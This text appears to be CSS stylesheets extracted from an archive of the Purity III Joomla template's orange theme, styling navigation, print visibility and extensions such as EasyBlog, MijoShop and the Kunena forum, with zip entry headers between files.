}
@media (min-width: 768px) and (max-width: 991px) {
  .hidden-sm {
    display: none !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .hidden-md {
    display: none !important;
  }
}
@media (min-width: 1200px) {
  .hidden-lg {
    display: none !important;
  }
}
.visible-print {
  display: none !important;
}
@media print {
  .visible-print {
    display: block !important;
  }
  table.visible-print {
    display: table !important;
  }
  tr.visible-print {
    display: table-row !important;
  }
  th.visible-print,
  td.visible-print {
    display: table-cell !important;
  }
}
.visible-print-block {
  display: none !important;
}
@media print {
  .visible-print-block {
    display: block !important;
  }
}
.visible-print-inline {
  display: none !important;
}
@media print {
  .visible-print-inline {
    display: inline !important;
  }
}
.visible-print-inline-block {
  display: none !important;
}
@media print {
  .visible-print-inline-block {
    display: inline-block !important;
  }
}
@media print {
  .hidden-print {
    display: none !important;
  }
}PKӜ�\��VpTT2purity_iii/css/themes/orange/legacy-navigation.cssnu&1i�.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  left: 100%;
  margin-top: -5px;
  margin-left: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: right;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 0 5px 5px;
  border-left-color: #111111;
  margin-top: 5px;
  margin-right: -5px;
}
.dropdown-submenu.open > a:after {
  border-left-color: #ffffff;
}PKӜ�\�y���4purity_iii/css/themes/orange/extras/com_easyblog.cssnu&1i�#eblog-wrapper .btn-eb-navbar {
  height: 30px;
  width: 44px;
}
#eblog-wrapper #eblog-search .search-input input {
  height: 30px !important;
}
.ezb-mod.mod_easyblogcategories .mod-item {
  padding-top: 20px !important;
}
div#fd.eb .eb-post + .eb-post {
  border-top: 1px solid #eeeeee;
  padding-top: 40px;
}
.mod-es-recent-blogs .es-nav-blogs {
  margin: 0;
  padding: 0;
}
.mod-es-recent-blogs .es-nav-blogs li {
  list-style-type: none;
}
.mod-es-recent-blogs .es-nav-blogs li .media-object {
  margin-bottom: 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media {
  padding: 0 !important;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object {
  float: none !important;
  padding: 0;
  margin: 0 0 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object img {
  max-width: 100%;
}
.mod-easyblogtagcloud .tag-cloud {
  margin: 0 10px 5px 0;
  display: inline-block;
  line-height: normal !important;
}PKӜ�\���qq7purity_iii/css/themes/orange/extras/layout_glossary.cssnu&1i�.glossary-nav {
  position: relative;
  z-index: 10;
  margin-bottom: 40px;
}
.glossary-nav nav {
  padding: 0;
}
.glossary-nav nav.affix {
  top: auto;
  position: relative;
}
.glossary-nav nav .nav-pills {
  background: #fff;
}
.glossary-nav nav .nav-pills > li {
  display: block;
  float: left;
  margin: 0 1px 10px 0;
}
.glossary-nav nav .nav-pills > li > a {
  background: #444444;
  color: #eeeeee;
  font-size: 18px;
  font-weight: 600;
  line-height: normal;
  padding: 0;
  width: 50px;
  height: 50px;
  line-height: 50px;
  text-align: center;
  text-transform: uppercase;
}
.glossary-nav nav .nav-pills > li > a:hover,
.glossary-nav nav .nav-pills > li > a:active,
.glossary-nav nav .nav-pills > li > a:focus {
  background: #ff8800;
  color: #fff;
}
@media screen and (min-width: 991px) {
  .glossary-nav nav.affix {
    top: 57px;
    position: fixed;
  }
  .glossary-nav nav .nav-pills > li > a {
    font-size: 24px;
  }
}
.glossary-group {
  margin-bottom: 40px;
  position: relative;
}
.glossary-group a[name] {
  position: absolute;
  top: -120px;
}
.glossary-group-title {
  background: #f7f7f7;
  color: #222222;
  font-weight: 600;
  font-size: 35px;
  margin: 0 0 20px;
  padding: 15px;
  text-transform: uppercase;
}
.glossary-group-items ul {
  padding: 0;
  margin: 0;
}
.glossary-group-items ul > li {
  list-style: none;
  padding: 0;
}
.glossary-group-items ul > li > a {
  color: #444444;
  display: block;
  font-size: 18px;
  padding: 5px 15px;
}
.glossary-group-items ul > li > a:hover,
.glossary-group-items ul > li > a:active,
.glossary-group-items ul > li > a:focus {
  color: #ff8800;
  text-decoration: none;
}PKӜ�\=[����6purity_iii/css/themes/orange/extras/com_easysocial.cssnu&1i�.com_easysocial .es-toolbar .es-navbar-search .search-query::-moz-placeholder {
  color: #ffffff;
}
.com_easysocial .stream-meta {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .stream-meta .stream-title .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .stream-meta .stream-content .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .es-stream-meta .es-stream-title .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .dropdown-menu > li {
  border: 0;
}
.com_easysocial #es .app-news .checkbox input[type="checkbox"] {
  position: relative;
  margin-left: 0;
}
#es .o-nav--block {
  white-space: normal;
}
.es {
  clear: both;
}PKӜ�\w� �OO4purity_iii/css/themes/orange/extras/com_mijoshop.cssnu&1i�.com_mijoshop .common-home #content_oc h1,
.com_mijoshop .common-home #content_oc h2 {
  font-size: 24px;
}
.com_mijoshop .box_oc .box-product {
  margin-left: 0;
  padding: 20px;
}
.com_mijoshop .box_oc .box-product > div {
  float: left;
  margin: 0;
  margin-right: 20px;
  width: 100%;
}
.com_mijoshop .box_oc .box-product > div .image {
  display: inline-block;
  border: 1px solid #eeeeee;
  padding: 5px;
  text-align: left;
}
.com_mijoshop .box_oc .box-product > div .image a {
  display: inline-block;
}
.com_mijoshop .box_oc .box-product > div .image img {
  border: 0;
  padding: 0;
}
.com_mijoshop .box_oc .box-product > div .name {
  padding: 10px 0;
  text-align: left;
}
.com_mijoshop .box_oc .box-product > div .price {
  margin: 10px 0;
}
.com_mijoshop .box_oc #tab-related .box-product > div {
  width: auto;
}
.com_mijoshop .box_oc .box-content .content_oc p * {
  margin: 10px 10px 10px 0;
}
.com_mijoshop #header_oc {
  margin: 0 0 20px;
  padding: 0;
}
.com_mijoshop #header_oc #currency {
  top: 0;
}
.com_mijoshop #header_oc #currency a {
  margin-top: 5px;
}
.com_mijoshop #header_oc #cart {
  border-left: 1px solid #eeeeee;
  margin-left: 20px;
  top: 5px;
}
.com_mijoshop #header_oc #cart .heading {
  margin-top: 0;
}
.com_mijoshop #header_oc #search_oc {
  top: 10px;
  width: 120px;
}
.com_mijoshop #header_oc #search_oc input[type="text"] {
  border-radius: 0;
  height: 25px;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
.com_mijoshop #header_oc .links {
  bottom: 0;
  top: auto;
}
.com_mijoshop #currency .dropdown-menu > li,
.com_mijoshop #top-links .dropdown-menu > li {
  border-color: #eeeeee;
}
.com_mijoshop #currency .dropdown-menu > li a:hover,
.com_mijoshop #top-links .dropdown-menu > li a:hover,
.com_mijoshop #currency .dropdown-menu > li a:focus,
.com_mijoshop #top-links .dropdown-menu > li a:focus {
  color: #ffffff;
}
.com_mijoshop #currency .open a,
.com_mijoshop #top-links .open a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .image img {
  max-width: 100%;
  width: 100%;
}
.com_mijoshop .mijoshop .product-thumb .caption {
  padding: 15px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 {
  margin: 0 0 10px;
  font-size: 15px;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a:hover,
.com_mijoshop .mijoshop .product-thumb .caption h4 a:focus {
  color: #ff8800;
}
.com_mijoshop .mijoshop .product-thumb .caption .price {
  font-weight: 700;
  color: #ff8800;
  margin-top: 10px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption .price .price-tax {
  color: #999999;
  font-weight: 400;
}
.com_mijoshop #content_oc > h2 {
  margin-bottom: 30px;
  font-size: 24px;
}
.com_mijoshop #content_oc > p {
  padding: 10px 20px;
  border: 1px solid #eeeeee;
  margin-bottom: 20px !important;
  margin-top: 10px !important;
}
.com_mijoshop #content_oc .product-filter {
  padding-bottom: 10px;
}
.com_mijoshop #content_oc .product-filter .display {
  padding-top: 15px;
}
.com_mijoshop #content_oc .product-grid .product-thumb .caption {
  min-height: 200px !important;
}
.com_mijoshop #content_oc .product-list .product-thumb .image {
  padding: 0 20px 0 0;
  height: 200px;
}
.com_mijoshop #content_oc .product-list .product-thumb .image > a {
  height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .image img {
  max-width: 100%;
  max-height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .caption {
  overflow: hidden;
  margin: 0;
  padding: 20px 20px 20px 0 !important;
  min-height: 161px !important;
}
.com_mijoshop .product-info .left {
  width: 30% !important;
}
.com_mijoshop .product-info .right {
  min-height: 352px;
  width: 65% !important;
}
.com_mijoshop .product-info .right .description {
  border-top: 0;
  padding: 0 0 10px;
}
.com_mijoshop .product-info .right .cart div input[type="text"],
.com_mijoshop .product-info .right .cart div input[type="button"] {
  display: inline-block;
}
.com_mijoshop .product-info .right .cart div input[type="text"] {
  padding-left: 5px;
  padding-right: 5px;
}
.com_mijoshop .product-info .right .cart div span {
  color: #999999;
}
.com_mijoshop #tab-description,
.com_mijoshop #tab-review {
  padding: 20px;
}
.com_mijoshop .content_oc ul {
  list-style: none;
  margin: 0;
  padding: 0;
}
.com_mijoshop .cart-info .quantity input[type='text'] {
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  height: 28px;
  padding-top: 0;
  padding-bottom: 0;
}
.com_mijoshop .cart-module #coupon input,
.com_mijoshop .cart-module #voucher input {
  display: inline-block;
}
.com_mijoshop .cart-module #shipping table {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.com_mijoshop .cart-module #shipping table td {
  padding: 10px 20px;
}
.com_mijoshop .box-category ul li {
  padding: 10px 10px 10px 0;
}
.com_mijoshop #colorbox {
  box-sizing: unset !important;
}
.com_mijoshop #column-right .row > div {
  width: 100%;
  float: none;
}
.com_mijoshop .t3-sidebar .mijoshop .container_oc .row > div {
  width: 100%;
  float: none;
}PKӜ�\BL���7purity_iii/css/themes/orange/extras/com_easydiscuss.cssnu&1i�#discuss-wrapper .nav-collapse.collapse {
  display: block;
}
#discuss-wrapper .nav-collapse.collapse .modal-body .row-fluid {
  margin-left: 0;
  margin-right: 0;
}PKӜ�\���I�o�o2purity_iii/css/themes/orange/extras/com_kunena.cssnu&1i�#kunena.layout .btn-group .dropdown-menu {
  background: #ffffff;
  border-color: #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li {
  border-top: 1px solid #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li a {
  color: #444444;
}
#kunena.layout .btn-group .dropdown-menu li a:hover {
  background-color: #eeeeee;
}
#kunena.layout .btn-group .dropdown-menu li:empty {
  display: none;
}
#kunena.layout input[type="checkbox"] {
  height: auto;
}
#kunena.layout .navbar {
  background: transparent;
  border: 0;
  border-bottom: 3px solid #ff8800;
  border-radius: 0;
  min-height: 0;
}
#kunena.layout .navbar .nav {
  margin-bottom: 0;
  width: auto;
}
#kunena.layout .navbar .nav > li {
  margin-right: 3px;
  margin-left: 0;
}
#kunena.layout .navbar .nav > li > a {
  background-color: #444444;
  border-radius: 2px 2px 0 0;
  color: #ffffff;
  font-weight: 400;
  line-height: 1.42857143;
  padding: 5px 10px;
  text-transform: none;
}
#kunena.layout .navbar .nav > li > a:hover,
#kunena.layout .navbar .nav > li > a:focus,
#kunena.layout .navbar .nav > li > a:active {
  background-color: #222222;
  box-shadow: none;
}
#kunena.layout .navbar .nav > li.active a {
  background-color: #ff8800;
  box-shadow: none;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .navbar-nav.pull-left > div {
    padding-top: 10px;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .btn {
    background: #ff8800;
    color: #ffffff;
    text-align: center;
    text-decoration: none;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse {
    background: #ffffff;
    display: none;
    padding: 0;
    position: absolute;
    width: 100%;
    z-index: 10;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse.in {
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav {
    border: 1px solid #eeeeee;
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li {
    background: #ffffff;
    border: 0;
    margin-right: 0;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a {
    background: #ffffff;
    color: #444444;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:hover,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:focus,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:active {
    color: #ff8800;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li.active a {
    color: #ff8800;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li + li {
    border-top: 1px solid #eeeeee;
  }
}
#kunena.layout .navbar .mobile-user {
  border-radius: 0;
  color: #444444;
  margin-right: 0;
  margin-top: 0 !important;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle {
  background-color: transparent;
  border-radius: 0;
  color: #444444;
  padding: 5px 10px;
  line-height: 20px;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle:hover,
#kunena.layout .navbar .mobile-user .dropdown-toggle:focus,
#kunena.layout .navbar .mobile-user .dropdown-toggle:active {
  background-color: transparent;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle img {
  box-shadow: none;
  height: 17px;
  width: 17px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu {
  background: #ffffff;
  border: 1px solid #eeeeee;
  padding: 20px;
  min-width: 270px;
  left: auto;
  right: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .form-group > div + div {
  margin-top: 10px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .input-group input {
  width: 100%;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail {
  border: 1px solid #eeeeee;
  line-height: 50px;
  height: 50px;
  width: 50px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail .glyphicon {
  font-size: 14px;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .fa-big {
  color: #666666;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .list-unstyled li {
  font-size: 11px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu select,
#kunena.layout .navbar .mobile-user .dropdown-menu textarea,
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="text"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="password"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="datetime"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="datetime-local"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="date"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="month"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="time"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="week"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="number"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="email"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="url"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="search"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="tel"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="color"],
#kunena.layout .navbar .mobile-user .dropdown-menu .inputbox {
  width: auto;
  display: inline-block;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .divider {
  background: #eeeeee;
  height: 1px;
  margin: 10px 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link {
  color: #666666;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:hover,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:focus,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:active {
  color: #ff8800;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .kavatar {
  max-width: 60px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form label {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form a.btn {
  border: 0;
  padding: 0;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .fa {
  margin-right: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu a.btn {
  border: 0;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form .btn {
  border: 0;
  margin: 0;
  padding: 0;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .mobile-user .dropdown-menu a[data-target="#statusTextModal"] {
    pointer-events: none;
  }
}
#kunena.layout .navbar .mobile-user .list-unstyled li + li {
  margin-top: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu {
  left: auto;
  right: 0;
  width: 250px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a {
  color: #444444;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:hover,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:focus,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:active {
  color: #b35f00;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form {
  padding: 0 10px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  display: inline-block;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div .btn {
  font-size: 12px;
  padding: 0 5px 2px;
  text-transform: none;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu .btn {
  padding-top: 0;
  padding-bottom: 0;
}
#kunena.layout #jumpto {
  margin-bottom: 20px;
}
#kunena.layout .table > thead > tr > th,
#kunena.layout .table > tbody > tr > th,
#kunena.layout .table > tfoot > tr > th,
#kunena.layout .table > thead > tr > td,
#kunena.layout .table > tbody > tr > td,
#kunena.layout .table > tfoot > tr > td {
  padding: 15px;
}
#kunena.layout .well {
  background: transparent;
  border: 1px solid #eeeeee;
  box-shadow: none;
}
#kunena.layout .topictitle {
  color: #222222;
  font-weight: 500;
  font-size: 16px;
}
#kunena.layout .topictitle:hover,
#kunena.layout .topictitle:focus,
#kunena.layout .topictitle:active {
  color: #ff8800;
}
#kunena.layout .started {
  color: #999999;
  font-size: 13px;
  margin-top: 3.33333333px;
}
#kunena.layout .container-fluid .col-md-9 {
  padding-right: 0;
}
#kunena.layout .modal {
  position: fixed;
}
#kunena.layout .table {
  border: 1px solid #eeeeee;
  float: none;
}
#kunena.layout .table .col-md-2 .col-md-3,
#kunena.layout .table .col-md-3 .col-md-3 {
  padding-right: 10px;
}
#kunena.layout .table .kavatar {
  background: #ffffff;
  border: 1px solid #eeeeee;
  display: block;
  padding: 3px;
}
#kunena.layout .table thead {
  background: #444444;
  color: #ffffff;
  font-size: 14px;
}
#kunena.layout .table thead .well {
  color: #444444;
}
#kunena.layout .table thead tr td {
  border: 0;
}
#kunena.layout .table thead tr td + td {
  border-left: 1px solid rgba(255, 255, 255, 0.2);
}
#kunena.layout .table tr td {
  border: 1px solid #eeeeee;
  float: none !important;
}
#kunena.layout .table tr td.col-md-5 {
  position: relative;
  min-height: 1px;
  padding-right: 20px;
  padding-left: 20px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-5 {
    float: left;
    width: 33.33333333%;
  }
}
#kunena.layout .table tr td.col-md-2 + .col-md-2 {
  position: relative;
  min-height: 1px;
  padding-right: 20px;
  padding-left: 20px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-2 + .col-md-2 {
    float: left;
    width: 25%;
  }
}
#kunena.layout .table td.hidden-xs > a {
  color: #999999;
}
#kunena.layout .table td.hidden-xs > a:hover,
#kunena.layout .table td.hidden-xs > a:focus,
#kunena.layout .table td.hidden-xs > a:active {
  color: #b35f00;
}
#kunena.layout tbody .col-md-2,
#kunena.layout tbody .col-md-3 {
  color: #666666;
  font-size: 13px;
}
#kunena.layout .btn {
  font-size: 12px;
  padding: 6.66666667px 10px;
  margin-top: 0;
  line-height: 1;
}
#kunena.layout .btn .caret {
  border-top-color: #ffffff;
}
#kunena.layout .btn-default {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
}
#kunena.layout .btn-default .caret {
  border-top-color: #666666;
}
#kunena.layout .btn-default:hover,
#kunena.layout .btn-default:focus,
#kunena.layout .btn-default:active {
  background: #f7f7f7;
}
#kunena.layout .btn-group + .btn-group {
  margin-left: 5px;
}
#kunena.layout #btn_report {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
  padding: 4px 10px;
}
#kunena.layout #btn_report .fa {
  color: #ff8800;
}
#kunena.layout #btn_report:hover,
#kunena.layout #btn_report:focus,
#kunena.layout #btn_report:active {
  border-color: #ff8800;
}
#kunena.layout .kfrontend {
  padding-top: 0;
  margin-bottom: 20px;
  padding-bottom: 0;
}
#kunena.layout .kfrontend:before,
#kunena.layout .kfrontend:after {
  display: table;
  content: " ";
}
#kunena.layout .kfrontend:after {
  clear: both;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa {
  background: transparent;
  border: 1px solid #999999;
  color: #999999;
  height: 28px;
  line-height: 22px;
  padding: 0;
  margin: 8px 12px 0 0;
  visibility: visible;
  text-align: center;
  width: 28px;
  opacity: 0.2;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:before {
  font-size: 24px;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover {
  opacity: 0.5;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover:before {
  color: #ffffff;
}
#kunena.layout .kfrontend h1,
#kunena.layout .kfrontend h2.btn-link {
  background-color: #444444;
  font-size: 17px;
  font-weight: 500;
  padding: 10px 20px;
  margin: 0;
}
#kunena.layout .kfrontend h1 a,
#kunena.layout .kfrontend h2.btn-link a {
  color: #ffffff;
}
#kunena.layout .kfrontend h1 a:hover,
#kunena.layout .kfrontend h2.btn-link a:hover,
#kunena.layout .kfrontend h1 a:focus,
#kunena.layout .kfrontend h2.btn-link a:focus,
#kunena.layout .kfrontend h1 a:active,
#kunena.layout .kfrontend h2.btn-link a:active {
  border-bottom: 0;
  text-decoration: none;
}
#kunena.layout .kfrontend h1:hover,
#kunena.layout .kfrontend h2.btn-link:hover {
  text-decoration: none;
}
#kunena.layout .kfrontend .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
#kunena.layout .kfrontend .section {
  margin-bottom: 0;
}
#kunena.layout .kfrontend .section:before,
#kunena.layout .kfrontend .section:after {
  display: table;
  content: " ";
}
#kunena.layout .kfrontend .section:after {
  clear: both;
}
#kunena.layout .kfrontend .section table {
  border: 1px solid #eeeeee;
}
#kunena.layout .kfrontend .section table th,
#kunena.layout .kfrontend .section table td {
  border: 1px solid #eeeeee;
  padding: 10px 20px;
}
#kunena.layout .kfrontend .section table tr {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table tr.category {
  background-color: #ffffff;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 {
  width: 8%;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a {
  display: block;
  color: #999999;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:hover,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:focus,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:active {
  color: #b35f00;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-8 {
    width: 35%;
  }
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 {
  vertical-align: middle;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 div {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-4 {
  padding-right: 10px;
  margin-top: 5px;
  width: 40px;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-8 {
    width: auto;
    max-width: 80%;
  }
}
#kunena.layout .kfrontend .section table tr.category:nth-child(2n+1) {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table .well {
  background-color: transparent;
  box-shadow: none;
  border: 0;
  padding: 0;
}
#kunena.layout .kfrontend .section table .header-desc {
  margin-top: 10px;
  margin-bottom: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline {
  border-top: 1px solid #eeeeee;
  padding-top: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline li {
  margin-bottom: 5px;
}
#kunena.layout .kfrontend .section table ul.list-inline li a {
  color: #444444;
}
#kunena.layout .kfrontend .section table ul.list-inline li a i {
  color: #999999;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus,
#kunena.layout .kfrontend .section table ul.list-inline li a:active {
  color: #b35f00;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover i,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus i,
#kunena.layout .kfrontend .section table ul.list-inline li a:active i {
  color: #b35f00;
}
#kunena.layout .kfrontend .section table ul.list-inline li i {
  margin-right: 5px;
}
#kunena.layout .kfrontend #kwho .well,
#kunena.layout .kfrontend #kstats .well {
  background-color: #ffffff;
  margin-bottom: 0;
  padding: 20px 0 0;
}
#kunena.layout .kfrontend #kwho .well i,
#kunena.layout .kfrontend #kstats .well i {
  margin-top: 0;
}
#kunena.layout .kfrontend #kwho .well .btn-link,
#kunena.layout .kfrontend #kstats .well .btn-link {
  color: #999999;
  text-align: left;
}
#kunena.layout .kfrontend #kwho .list-unstyled span + span {
  margin-left: 6.66666667px;
}
#kunena.layout .form-search .btn {
  padding: 0 20px;
  top: 0;
  height: 36px;
}
#kunena.layout .form-search .search {
  height: 36px;
}
#kunena.layout .form-search .search input {
  border-color: #cccccc;
  height: 36px;
  top: 0;
  padding: 0 10px;
  left: -11px;
}
#kunena.layout .form-search .search input:focus {
  border-color: #ff8800;
  box-shadow: none;
}
#kunena.layout #search .well {
  padding-top: 0;
}
#kunena.layout #search > .text-center {
  margin-bottom: 40px;
}
#kunena.layout #search #categorylist {
  margin-bottom: 10px;
}
#kunena.layout #search .row {
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 {
  border: 1px solid #eeeeee;
  padding: 10px;
  margin-top: 20px;
}
@media (min-width: 992px) {
  #kunena.layout #search .row > .col-md-6 {
    margin-right: 20px;
    width: 46%;
  }
}
#kunena.layout #search .row > .col-md-6 fieldset {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 select {
  width: 100%;
}
#kunena.layout #search .row > .col-md-6 select + select {
  margin-top: 10px;
}
#kunena.layout #search .row > .col-md-6 legend {
  margin-bottom: 4px;
  font-size: 14px;
  padding: 0 10px;
}
#kunena.layout #postform .column-item fieldset {
  border: 0;
  padding: 0;
}
@media (min-width: 992px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-left: 0;
    margin-right: 0;
  }
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-bottom: 10px;
  }
  #kunena.layout #postform .column-item fieldset .form-group label {
    margin-bottom: 5px;
    width: 100%;
  }
  #kunena.layout #postform .column-item fieldset .form-group #postcatid {
    margin-left: 0;
  }
}
#kunena.layout #postform .column-item fieldset .controls {
  margin-left: 107px;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .controls {
    padding-left: 20px;
    padding-right: 20px;
    margin-left: 0;
  }
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:before,
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  display: table;
  content: " ";
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #999999;
  padding: 0;
  margin: 0 10px 10px 0;
  line-height: 40px;
  text-align: center;
  height: 40px;
  width: 40px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label .fa {
  font-size: 18px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"]:checked + label {
  background: transparent;
  border: 1px solid #ff8800;
  color: #ff8800;
  padding: 0;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor {
  border: 0;
  margin-bottom: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li {
  margin-right: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li a {
  border: 1px solid #eeeeee;
  color: #444444;
  padding: 5px 10px;
  line-height: 1;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li.active a {
  background: #ff8800;
  border: 1px solid #ff8800;
  color: #ffffff;
}
